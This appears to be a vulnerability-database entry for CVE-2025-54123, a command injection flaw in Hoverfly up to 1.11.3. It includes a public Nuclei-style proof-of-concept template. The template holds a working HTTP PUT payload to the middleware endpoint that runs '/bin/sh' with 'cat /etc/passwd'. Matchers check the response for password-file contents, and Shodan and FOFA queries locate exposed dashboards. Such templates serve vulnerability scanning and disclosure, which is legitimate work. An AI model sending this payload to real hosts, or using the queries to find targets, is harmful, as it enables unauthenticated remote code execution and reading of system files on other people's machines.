Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
PoC代码[已公开]
id: CVE-2025-54123
info:
name: Hoverfly <= 1.11.3 - Remote Code Execution
author: nukunga[seonghyeonJeon]
severity: critical
description: |
Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
reference:
- https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
- https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
metadata:
verified: true
max-requests: 1
shodan-query:
- http.favicon.hash:1357234275
- title:"Hoverfly Dashboard"
fofa-query:
- icon_hash="1357234275"
- title="Hoverfly Dashboard"
tags: cve,cve2025,hoverfly,rce,intrusive
http:
- raw:
- |
PUT /api/v2/hoverfly/middleware HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"binary": "/bin/sh",
"script": "cat /etc/passwd"
}
matchers:
- type: dsl
dsl:
- "status_code == 422"
- "regex('root:x:0:0', body)"
- "contains_all(body, 'STDOUT:','hoverfly')"
condition: and
# digest: 4a0a00473045022100ece8637baa7b3a18890fa37553d373b2862ad337c044c755f048ebfb2d03346c022017b935a082b4c404fe9f2f80d3473dc54b9add184e1bd754a1b1eca6f9778cb6:922c64590222798bb761d5b6d8e72950